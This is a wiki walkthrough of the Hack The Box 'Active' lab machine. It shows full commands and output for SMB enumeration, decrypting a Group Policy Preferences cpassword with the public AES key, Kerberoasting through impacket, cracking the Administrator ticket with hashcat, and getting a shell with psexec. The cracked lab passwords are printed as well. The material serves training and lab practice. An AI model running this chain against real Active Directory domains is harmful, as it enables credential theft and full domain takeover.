Active

From Luniwiki
Jump to: navigation, search

Back

Active01.png

Port scan

root@kali:~/HTB/Machines/Active# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.100 --rate=1000

Starting masscan 1.0.5 at 2019-12-03 19:49:39 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 61581/udp on 10.10.10.100 Discovered open port 389/tcp on 10.10.10.100 Discovered open port 139/tcp on 10.10.10.100 Discovered open port 9389/tcp on 10.10.10.100 Discovered open port 49154/tcp on 10.10.10.100 Discovered open port 61157/udp on 10.10.10.100 Discovered open port 49158/tcp on 10.10.10.100 Discovered open port 53/udp on 10.10.10.100 Discovered open port 3269/tcp on 10.10.10.100 Discovered open port 49169/tcp on 10.10.10.100 Discovered open port 445/tcp on 10.10.10.100 Discovered open port 5722/tcp on 10.10.10.100 Discovered open port 49155/tcp on 10.10.10.100 Discovered open port 3268/tcp on 10.10.10.100 Discovered open port 464/tcp on 10.10.10.100 Discovered open port 49157/tcp on 10.10.10.100 Discovered open port 135/tcp on 10.10.10.100 Discovered open port 47001/tcp on 10.10.10.100 Discovered open port 60900/udp on 10.10.10.100 Discovered open port 88/tcp on 10.10.10.100 Discovered open port 49171/tcp on 10.10.10.100 Discovered open port 636/tcp on 10.10.10.100 Discovered open port 53/tcp on 10.10.10.100 Discovered open port 49182/tcp on 10.10.10.100 Discovered open port 49152/tcp on 10.10.10.100 Discovered open port 593/tcp on 10.10.10.100 Discovered open port 60785/udp on 10.10.10.100 Discovered open port 49153/tcp on 10.10.10.100
root@kali:~/HTB/Machines/Active# nmap -sC -sV 10.10.10.100
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 14:50 EST
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.043s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2019-12-03 19:50:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results: |_clock-skew: 2s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2019-12-03T19:51:49 |_ start_date: 2019-12-03T19:14:25
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 190.91 seconds

Active directory enumeration

Simple smbclient anonymous enumeration

root@kali:~/HTB/Machines/Active# smbclient -L //10.10.10.100
Enter WORKGROUP\root's password:
Anonymous login successful

Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Replication Disk SYSVOL Disk Logon server share Users Disk SMB1 disabled -- no workgroup available

Nullinux setup

root@kali:~/HTB/Utils# git clone https://github.com/m8r0wn/nullinux
Cloning into 'nullinux'...
remote: Enumerating objects: 63, done.
remote: Counting objects: 100% (63/63), done.
remote: Compressing objects: 100% (51/51), done.
remote: Total 383 (delta 27), reused 16 (delta 6), pack-reused 320
Receiving objects: 100% (383/383), 89.01 KiB | 1.20 MiB/s, done.
Resolving deltas: 100% (205/205), done.
root@kali:~/HTB/Utils# cd nullinux/
root@kali:~/HTB/Utils/nullinux# ./setup.sh

[*] Starting nullinux setup script Collecting ipparser (from -r requirements.txt (line 1)) Downloading https://files.pythonhosted.org/packages/d3/9d/aeaa797f7278c6dca39b6878a252b03e70cd09a2b956f56bfdcc186cc9ba/ipparser-0.3.5.tar.gz Requirement already satisfied: dnspython in /usr/lib/python3/dist-packages (from ipparser->-r requirements.txt (line 1)) (1.16.0) Building wheels for collected packages: ipparser Running setup.py bdist_wheel for ipparser ... done Stored in directory: /root/.cache/pip/wheels/02/2c/c5/ab538902253acfd931309bbcb10ab441e6b67a0e944802b206 Successfully built ipparser Installing collected packages: ipparser Successfully installed ipparser-0.3.5 [*] Checking for smbclient [+] smbclient installed
[*] nullinux setup complete

Nullinux enumeration

root@kali:~/HTB/Machines/Active# python3 ../../Utils/nullinux/nullinux.py -v 10.10.10.100

Starting nullinux v5.4.1 | 01-05-2020 14:08
[*] Enumerating Shares for: 10.10.10.100 Shares Comments ------------------------------------------- \\10.10.10.100\ADMIN$ Remote Admin \\10.10.10.100\C$ Default share \\10.10.10.100\IPC$ \\10.10.10.100\NETLOGON Logon server share \\10.10.10.100\Replication \\10.10.10.100\SYSVOL Logon server share \\10.10.10.100\Users
[*] Enumerating: \\10.10.10.100\ADMIN$ [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating: \\10.10.10.100\C$ [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating: \\10.10.10.100\IPC$ [-] NT_STATUS_ACCESS_DENIED listing \*
[*] Enumerating: \\10.10.10.100\NETLOGON [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating: \\10.10.10.100\Replication . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 active.htb D 0 Sat Jul 21 06:37:44 2018
[*] Enumerating: \\10.10.10.100\SYSVOL [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating: \\10.10.10.100\Users [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating Domain Information for: 10.10.10.100 [-] Could not attain Domain SID
[*] Enumerating querydispinfo for: 10.10.10.100
[*] Enumerating enumdomusers for: 10.10.10.100
[*] Enumerating LSA for: 10.10.10.100
[*] Performing RID Cycling for: 10.10.10.100 [-] RID Failed: Could not attain Domain SID
[*] Testing 10.10.10.100 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.100
[*] 0 unique user(s) identified

Download of share network Replication

root@kali:~/HTB/Machines/Active/smbclient/Replication# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

10459647 blocks of size 4096. 4931606 blocks available smb: \> cd active.htb smb: \active.htb\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018 Policies D 0 Sat Jul 21 06:37:44 2018 scripts D 0 Wed Jul 18 14:48:57 2018
10459647 blocks of size 4096. 4931606 blocks available smb: \active.htb\> prompt smb: \active.htb\> recurse smb: \active.htb\> mget * getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.7 KiloBytes/sec) (average 0.4 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (6.1 KiloBytes/sec) (average 2.3 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.9 KiloBytes/sec) (average 2.4 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (15.3 KiloBytes/sec) (average 5.0 KiloBytes/sec) getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 4.2 KiloBytes/sec) getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (20.4 KiloBytes/sec) (average 6.5 KiloBytes/sec)

group.xml file

root@kali:~/HTB/Machines/Active/smbclient/Replication# find -type f
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI

In the files downloaded, there is an interresting file group.xml

root@kali:~/HTB/Machines/Active/smbclient/Replication# cat "./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml"
<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Cpassword from group.xml

In the Openspecification of Microsoft, we can find that the group.xml contains the user and the password of accounts services. The password is encrypted but the AES key is public.

root@kali:~/HTB/Utils# git clone https://github.com/PowerShellMafia/PowerSploit
root@kali:~/HTB/Utils# cd PowerSploit/Exfiltration'Bold text'
root@kali:~/HTB/Utils/PowerSploit/Exfiltration# view Get-GPPPassword.ps1

Powershell script

Inspiring in that script, this routine will decrypt the Cpassword of the group.xml file.

root@kali:~/HTB/Machines/Active# cat Get-DecryptedCpassword.ps1
    function Get-DecryptedCpassword {
        Param (
            [string] $Cpassword
        )

try { #Append appropriate padding based on string length $Mod = ($Cpassword.length % 4)
switch ($Mod) { '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)} '2' {$Cpassword += ('=' * (4 - $Mod))} '3' {$Cpassword += ('=' * (4 - $Mod))} }
$Base64Decoded = [Convert]::FromBase64String($Cpassword)
#Create a new AES .NET Crypto Object $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8, 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
#Set IV to all nulls to prevent dynamic generation of IV value $AesIV = New-Object Byte[]($AesObject.IV.Length) $AesObject.IV = $AesIV $AesObject.Key = $AesKey $DecryptorObject = $AesObject.CreateDecryptor() [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock) }
catch {Write-Error $Error[0]} }
Get-DecryptedCpassword 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

The execution of the routine provides the password of the service user.

root@kali:~/HTB/Machines/Active# pwsh
PowerShell 6.2.3
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs Type 'help' to get help.
PS /root/HTB/Machines/Active> . ./Get-DecryptedCpassword.ps1 GPPstillStandingStrong2k18 PS /root/HTB/Machines/Active> exit

Alternative way with gpp-decrypt

An other way to decrypt the password is to use the command gpp-decrypt.

root@kali:~/HTB/Machines/Active# gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

The gpp-decrypt is a Ruby script included in Kali.

Alternative way manually with openssl

The password is encoded in base 64, but if we try to decode it, there is an error, because the padding is not correct. Adding padding characters (in base64 the padding character can be 1 or 2 =).

root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" | base64 -d 1>/dev/null
base64: invalid input
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ=" | base64 -d 1>/dev/null
base64: invalid input
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | base64 -d 1>/dev/null

The binary content is decoded with openssl providing the Microsoft's key. And the IV (initialization vector) set to 0.

root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | base64 -d | openssl aes-256-cbc -d -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0
hex string is too short, padding with zero bytes to length
GPPstillStandingStrong2k18

The base64 decode can be avoided with the modifier -a

root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | openssl aes-256-cbc -d -a -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0 
hex string is too short, padding with zero bytes to length
GPPstillStandingStrong2k18

User Flag

root@kali:~/HTB/Machines/Active# smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> get SVC_TGS\Desktop\user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as SVC_TGS\Desktop\user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
root@kali:~/HTB/Machines/Active# cat SVC_TGS\\Desktop\\user.txt
<USER_FLAG>

Kerberoasting

Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs). With the service account, Kerberoasting allows us to crack passwords for those accounts. By logging into an Active Directory domain as any authenticated user, we are able to request service tickets (TGS) for service accounts by specifying their SPN value. Active Directory will return an encrypted ticket, which is encrypted using the NTLM hash of the account that is associated with that SPN. You can then brute force these service tickets until successfully cracked, with no risk of detection or account lockouts. Once cracked, you have the service account password in plain text.

Install impackt tools

root@kali:~/HTB/Utils# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 29, done.
remote: Counting objects: 100% (29/29), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 17215 (delta 9), reused 13 (delta 5), pack-reused 17186
Receiving objects: 100% (17215/17215), 5.71 MiB | 18.16 MiB/s, done.
Resolving deltas: 100% (13131/13131), done.

root@kali:~/HTB/Utils# cd impacket/ root@kali:~/HTB/Utils/impacket# python setup.py install

Retrieve SPN tickets

root@kali:~/HTB/Machines/Active# ../../Utils/impacket/examples/GetUserSPNs.py -request active.htb/SVC_TGS  -outputfile SPN2hashcat
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2018-07-30 13:17:40.656520

The tool has retreived the ticket in hashcat format.

root@kali:~/HTB/Machines/Active# cat SPN2hashcat
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$66be5612a75e8b848bee009cc6f1cd3d$0704e0568964fb5f33d76802ac1365a34bc12a1b6db6df1aa5c534a4a23fd377c00790dd615acc790bb1e43498d256cc5b85fb9b2dc500c96a268858ca14599f3750356054bcce04e04e50ef3d4f2b4dd43d18b868ad4db1865e3088c30ebd7079e8356fb74cf02c8635c143c13b640bd9cf641c858444ab2448351e1bbd52fa7352010a2d362b4d7a8d4f5fe35aab9ae2ca69057edad31eb350493f2ecfc359e16406c885ffde8b9252eb8a19e02c4b453e23534b23ba62776516cab94efb3e690d5761af91c756bab200330057347a33c99a55d4522dd80d72be52d805749f11a6b10c10be450087fbc3eab2efef26e4d21eff2c0a338589e090900d5ff5d0fef4bb07a2fc11387e056a36da505e9093d65f14d24b8fa711eb8a24307b3f6111844678c1a37394a2710f4feaf0e60506ee4b94314e209b1ddd62e52bd1bb16e758d0cc0a06f03c3decc79e5db686085987ac8c04e8e8a8e6e80e50ad67023c4495d185d6b0555a9921b6217d52e2a822a5ec9243d56667f0d02a826d1101b0ee8f6e3e43ef9f1776e846dc5265f150fff46c643540b8e2eed66c70c3af8ed8c3d44c82c0c70ce569b3bd584ca41920cce2285055134baec2fe3e368834baa83dbf3c550ed918581fd73920efc22b2a3f454ecf7446adf0fd0ae0c970149ee75c98b453ee666989716b4e876bce3ee998c3d215cf0df3350ab92536e8a4f153e72e46ab01a76159e46f2d68c5a836ffde9e24f8b58bb72f84acc13f6fc745f6247e3ed2200b99752da6eeead1b5c30a4cdd1448fd6ca8b41f9bc68b150a2118df7080ba6739f7c68b33e73b17fbd9d0797bfe2f0dcc083cf011f248a22d04f4359376eb1effa89f052be0841ca69022a09d07381856953fa6717c7187b0a302d1b3c582000dbac6c91c83759fb812c66e7d7ffb35552b3b9015b5c9de93bfb33867792a54616a9aed330dfefe79cf3ceeca5df6d46ca2e8c6adf3e6165e922f6c8adb76e3231fba3e00294d72de9041ae048b97364b68d601210a76703e23fbbb972ca952feb34ea1f25b30ba412896d35131effb417dd37184e0f5523a62668c060c9fa57020ca8774be4f624841307bfa76185fd9327f22cf914cd4df65c85f2e941e90dc798ce2626d82e901abfe7ea85b868600ee91be0fd241dfbf942f3e0dc34a0a3485feccf2ff13e788414a7d665d0568fcc67a08836e0e06bdb62f925269d32d3d0ef509790bdf11b38065b97052b108128b646388

Crack the ticket

root@kali:~/HTB/Machines/Active# hashcat -m 13100 SPN2hashcat --force /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2048/5878 MB allocatable, 8MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1
Applicable optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll' Dictionary cache hit: * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat Status...........: Running Hash.Type........: Kerberos 5 TGS-REP etype 23 Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...646388 Time.Started.....: Tue Jan 21 16:49:17 2020 (8 secs) Time.Estimated...: Tue Jan 21 16:49:32 2020 (7 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 911.8 kH/s (7.53ms) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress.........: 7798784/14344384 (54.37%) Rejected.........: 0/7798784 (0.00%) Restore.Point....: 7798784/14344384 (54.37%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: grega001 -> gooooal
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$66be5612a75e8b848bee009cc6f1cd3d$0704e0568964fb5f33d76802ac1365a34bc12a1b6db6df1aa5c534a4a23fd377c00790dd615acc790bb1e43498d256cc5b85fb9b2dc500c96a268858ca14599f3750356054bcce04e04e50ef3d4f2b4dd43d18b868ad4db1865e3088c30ebd7079e8356fb74cf02c8635c143c13b640bd9cf641c858444ab2448351e1bbd52fa7352010a2d362b4d7a8d4f5fe35aab9ae2ca69057edad31eb350493f2ecfc359e16406c885ffde8b9252eb8a19e02c4b453e23534b23ba62776516cab94efb3e690d5761af91c756bab200330057347a33c99a55d4522dd80d72be52d805749f11a6b10c10be450087fbc3eab2efef26e4d21eff2c0a338589e090900d5ff5d0fef4bb07a2fc11387e056a36da505e9093d65f14d24b8fa711eb8a24307b3f6111844678c1a37394a2710f4feaf0e60506ee4b94314e209b1ddd62e52bd1bb16e758d0cc0a06f03c3decc79e5db686085987ac8c04e8e8a8e6e80e50ad67023c4495d185d6b0555a9921b6217d52e2a822a5ec9243d56667f0d02a826d1101b0ee8f6e3e43ef9f1776e846dc5265f150fff46c643540b8e2eed66c70c3af8ed8c3d44c82c0c70ce569b3bd584ca41920cce2285055134baec2fe3e368834baa83dbf3c550ed918581fd73920efc22b2a3f454ecf7446adf0fd0ae0c970149ee75c98b453ee666989716b4e876bce3ee998c3d215cf0df3350ab92536e8a4f153e72e46ab01a76159e46f2d68c5a836ffde9e24f8b58bb72f84acc13f6fc745f6247e3ed2200b99752da6eeead1b5c30a4cdd1448fd6ca8b41f9bc68b150a2118df7080ba6739f7c68b33e73b17fbd9d0797bfe2f0dcc083cf011f248a22d04f4359376eb1effa89f052be0841ca69022a09d07381856953fa6717c7187b0a302d1b3c582000dbac6c91c83759fb812c66e7d7ffb35552b3b9015b5c9de93bfb33867792a54616a9aed330dfefe79cf3ceeca5df6d46ca2e8c6adf3e6165e922f6c8adb76e3231fba3e00294d72de9041ae048b97364b68d601210a76703e23fbbb972ca952feb34ea1f25b30ba412896d35131effb417dd37184e0f5523a62668c060c9fa57020ca8774be4f624841307bfa76185fd9327f22cf914cd4df65c85f2e941e90dc798ce2626d82e901abfe7ea85b868600ee91be0fd241dfbf942f3e0dc34a0a3485feccf2ff13e788414a7d665d0568fcc67a08836e0e06bdb62f925269d32d3d0ef509790bdf11b38065b97052b108128b646388:Ticketmaster1968
Session..........: hashcat Status...........: Cracked Hash.Type........: Kerberos 5 TGS-REP etype 23 Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...646388 Time.Started.....: Tue Jan 21 16:49:17 2020 (11 secs) Time.Estimated...: Tue Jan 21 16:49:28 2020 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 910.2 kH/s (7.47ms) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 10551296/14344384 (73.56%) Rejected.........: 0/10551296 (0.00%) Restore.Point....: 10534912/14344384 (73.44%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: Tiona172 -> TUGGAB8
Started: Tue Jan 21 16:49:16 2020 Stopped: Tue Jan 21 16:49:29 2020

The Administrator password is Ticketmaster1968

Root flag

We run a psexec with impact script

root@kali:~/HTB/Machines/Active# ../../Utils/impacket/examples/psexec.py Administrator@active.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password: [*] Requesting shares on active.htb..... [*] Found writable share ADMIN$ [*] Uploading file TkGvHmKO.exe [*] Opening SVCManager on active.htb..... [*] Creating service Lecg on active.htb..... [*] Starting service Lecg..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>type root.txt <ROOT_FLAG>
C:\Users\Administrator\Desktop>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on active.htb..... [*] Stopping service Lecg..... [*] Removing service Lecg..... [*] Removing file TkGvHmKO.exe.....

References

Daniel Simao 11:43, 5 January 2020 (EST)